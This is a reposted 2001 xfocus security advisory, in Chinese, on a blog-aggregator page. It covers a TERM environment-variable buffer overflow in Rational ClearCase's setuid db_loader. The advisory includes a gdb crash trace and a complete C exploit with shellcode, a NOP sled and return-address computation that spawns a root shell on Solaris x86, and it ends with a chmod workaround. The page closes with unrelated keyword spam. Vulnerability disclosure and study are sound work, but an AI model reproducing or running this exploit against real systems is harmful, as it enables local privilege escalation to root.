程序博客网 > 台湾聊天软件line

【实战】ClearCase db_loader环境变量溢出漏洞

来源:互联网 发布:台湾聊天软件line 编辑:程序博客网 时间:2024/06/02 16:32

ClearCase db_loader环境变量溢出漏洞


创建时间:2001-11-10
文章属性:原创
文章来源:http://xfocus.org
文章提交:inburst (inburst_at_263.net)

----------------------------------
ClearCase db_loader环境变量溢出漏洞
----------------------------------

发布信息
--------

发现日期:2001年8月
公布日期:2001年11月1日
发现者:virtualcat@xfocus.org
网站:http://xfocus.org


简单描述
--------

Rational 公司推出的软件配置管理工具ClearCase主要用于Windows和Unix开发环境。ClearCase提供了全面的配置管理功能——包括版本控制、工作空间管理、建立管理和过程控制,而且无需软件开发者改变他们现有的环境、工具和工作方式。
该管理工具存在一个db_loader程序,该程序默认安装设置了suid位,但当你使用一个超长的环境变量"TERM"的时候,会导致缓冲区溢出,该漏洞可能导致发生系统越权行为。

受影响的软件版本和平台
----------------------

影响版本:ClearCase 3.2+, 4.0, 4.1, 4.2
影响系统:Linux, Solaris sparc, Solaris x86, AIX, HP, Digital, IRIX, SCO etc.


细节
----

$ TERM=`perl -e 'print "A"x550'`
$ export TERM
$ /usr/atria/etc/db_loader
Bus Error
$ gdb db_loader core -q
(no debugging symbols found)...Core was generated by `./db_loader'.
Cannot access memory at address 0xffffffffff3e1b80
#0  0xf0db8 in imsg_fputs ()
(gdb) bt
#0  0xf0db8 in imsg_fputs ()
Cannot access memory at address 0x41414179
(gdb) i reg
g0             0x0      0
g1             0x7b000  503808
g2             0x13cf84 1298308
g3             0x0      0
g4             0xf6c2c  1010732
g5             0x0      0
g6             0x0      0
g7             0x143d58 1326424
o0             0xffffffff       -1
o1             0x1      1
o2             0xffbef054       -4263852
o3             0xf0c3c  986172
o4             0xffbeed8a       -4264566
o5             0xffffffff       -1
sp             0xffbeef70       -4264080
o7             0xf0db0  986544
l0             0x41414141       1094795585
l1             0x41414141       1094795585
l2             0x41414141       1094795585
l3             0x41414141       1094795585
l4             0x41414141       1094795585
l5             0x41414141       1094795585
l6             0x41414141       1094795585
l7             0x41414141       1094795585
i0             0x41414141       1094795585
i1             0x41414141       1094795585
i2             0x41414141       1094795585
i3             0x41414141       1094795585
i4             0x41414141       1094795585
i5             0x41414141       1094795585
fp             0x41414141       1094795585
i7             0x41414141       1094795585
y              0x0      0
psr            0xfe801007       -25161721       icc:N---, pil:0, s:0, ps:0, et:0, cwp:7
wim            0x0      0
tbr            0x0      0
pc             0xf0db8  986552
npc            0xf0dbc  986556
fpsr           0x0      0       rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr           0x0      0
(gdb)

本地用户可以通过这一漏洞越权得到超级用户权限。

测试程序
--------

ClearCase_x86exp.c

/* Rational ClearCase TERM environment variable buffer overflow exploit
*  test it again solaris x86 7, bug found by virtualcat@xfocus.org
*  xploit by xundi@xfocus.org
*  website: http://xfocus.org
*/

#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>

#define    RET_DIS            550
#define    NOP            0x90
#define    NNOP            512

#define    ENV_VAR            "TERM"

#define    USER_UPPER_MAGIC    0x08047fff

/* Shell code taken from Pablo Sor's "mailx -F" exploit code    */
char shellCode[] =
    "/xeb/x48/x9a/xff/xff/xff/xff/x07/xff/xc3/x5e/x31/xc0/x89/x46/xb4"
    "/x88/x46/xb9/x88/x46/x07/x89/x46/x0c/x31/xc0/x50/xb0/x8d/xe8/xdf"
    "/xff/xff/xff/x83/xc4/x04/x31/xc0/x50/xb0/x17/xe8/xd2/xff/xff/xff"
    "/x83/xc4/x04/x31/xc0/x50/x8d/x5e/x08/x53/x8d/x1e/x89/x5e/x08/x53"
    "/xb0/x3b/xe8/xbb/xff/xff/xff/x83/xc4/x0c/xe8/xbb/xff/xff/xff/x2f"
    "/x62/x69/x6e/x2f/x73/x68/xff/xff/xff/xff/xff/xff/xff/xff/xff";


int get_esp()
{
    __asm__("mov %esp,%eax");
}

int  getEnvAddr(const char* envPtr)
{
    int    envAddr = NULL;
    int    retCode = 0;

    char* charPtr = (char *) get_esp();

    /* Search for the starting address of the environment string for    */
    /* the specified environment variable                    */
    while((unsigned int)  charPtr < (unsigned int) USER_UPPER_MAGIC)
    {
        retCode = memcmp((unsigned char *) charPtr++, envPtr, 4);
        /* Found */
        if(retCode == 0)
        {
            envAddr = (int) (charPtr - 1);
            break;
        }
    }

    return envAddr;
}

int main(int argc, char** argv)
{

    char    buff[256] = {0};

    int*    intPtr = NULL;
    char*    buffPtr = NULL;
    char*    charPtr = NULL;

    int    retAddr = 0;
    int    retValue = 0;


    int    buffLen = 0;
    int    adjustment = 0;
    int    strLen = 0;
    int    alignment = 0;
    int    diff = 0;
    int    i;

    int shellCodeLen = strlen(shellCode);

    if(argc == 2)
    {
        adjustment = atoi(argv[1]);
    }

    buffLen = strlen(ENV_VAR) + RET_DIS + NNOP + shellCodeLen + 1;

    charPtr = getenv(ENV_VAR);

    /* Adjust the stupid alignment    */
    strLen = strlen(charPtr) + 1;
    alignment = strLen % 4;
    if(alignment != 0)
    {
        alignment = 4 - alignment;
        strLen += alignment;
    }

    alignment = buffLen % 4;
    if(alignment != 0)
    {
        alignment = 4 - alignment;
        buffLen += alignment;
    }

    retValue = getEnvAddr(ENV_VAR);

    diff = buffLen - strLen;

    retAddr = retValue - diff + strlen(ENV_VAR) + 1;

    alignment = retAddr % 4;

    if(alignment != 0)
    {
        alignment = 4 - alignment;
    }
    retAddr += RET_DIS + alignment +  adjustment;

    /* Allocate memory for the evil buffer    */
    buffPtr = (char *) malloc(buffLen);

    if(buffPtr != NULL)
    {

        strcpy(buffPtr, ENV_VAR);
        strcat(buffPtr, "=");
        charPtr = (char *) (buffPtr + strlen(buffPtr));

        /* Fill the rest of the buffer with 'A'     */
        memset(charPtr, 0x41, buffLen - strlen(buffPtr)-4);

        /* Butt in the return address            */
        intPtr = (int *) (charPtr + RET_DIS);
        *intPtr++ = retAddr;

        /* Make sure the NOPs are located word aligned     */
        charPtr = (char *) intPtr;
        charPtr += alignment;

        for(i=0; i<NNOP; i++)
        {
            *charPtr++ = NOP;
        }

        for(i=0; i<shellCodeLen; i++)
        {
            *charPtr++ = shellCode[i];
        }
        *charPtr = 0;

        putenv(buffPtr);

        printf("Jumping to 0x%.8x/n", retAddr);

        execl("/usr/atria/etc/db_loader", "xfocus", NULL);
    }
    else
    {
        printf("No more free memory!");
    }
}

/*..Thanks for all xfocus members.. especially virtualcat*/

临时解决办法
------------

# chmod a-s /usr/atria/etc/db_loader

厂商信息
--------

2001年8月已经通知厂商
厂商主页:http://www.rational.com

关于Xfocus
----------

Xfocus是一个于1998年在中国成立的非盈利的网络及系统安全组织,致力于发现网络、通信及软件硬件各方面的脆弱性并进行相关的研究。

版权所有 2001 http://xfocus.org,欢迎转载,但必须保留版权信息。

台湾聊天软件line 台湾聊天软件line
原创粉丝点击
热门IT博客
sql 统计总和sql 统计总和
四维彩超男女数据区别四维彩超男女数据区别
淘宝清关靠谱吗
男生唱的伤感网络歌曲
剑三苍爹男神脸数据
想开淘宝没货源
游戏公司的程序员累吗
2012年网络作家富豪榜
傲剑 明玉功数据
网络推广代运营合同
淘宝女装夏季睡衣
redis java教程
学做淘宝怎么样
电梯劝烟 知乎
js promise done fail
linux apache 服务名称
mac 怎么共享 windows
java json转字符串
lock java
信息与数据的区别在于
热门问题 老师的惩罚 人脸识别 我在镇武司摸鱼那些年 重生之率土为王 我在大康的咸鱼生活 盘龙之生命进化 天生仙种 凡人之先天五行 春回大明朝 姑娘不必设防,我是瞎子 制造费用分配率 乘法分配率公式 除法有分配率吗 分配率公式 乘法分配率的计算题 年度计划分配率分配法 乘法分配率用字母表示 分配生是什么意思 分配生 挖掘机分配阀 止回阀标准 分酒器批发 红酒分酒器 分酒器图片 分酒器怎么用 白酒分酒器容量多少 分酒器的作用 分酒器容量 一个分酒器有几两酒 分钟寺无痛人流医院 分钟寺人流医院哪家好 分钟寺附近医院 分钟寺燕竹医院电话 分钟寺地铁站 分钟寺到七里庄 分钟寺到颐和园 一线员工座谈会1分钟发言 期货日内高手3分钟线 分销代理 微商模式的分销系统 微店分销商 网商园分销商 三级分销的微商系统 怎么做淘宝分销商 电子元器件分销商 店铺分销商是什么意思 什么是分销商 分销商和代理商的区别 成为分销商 如何成为分销商 分销商和经销商的区别

程序博客网,程序员的互联网技术博客家园。csdn论坛精品 msdn技术资料都在这里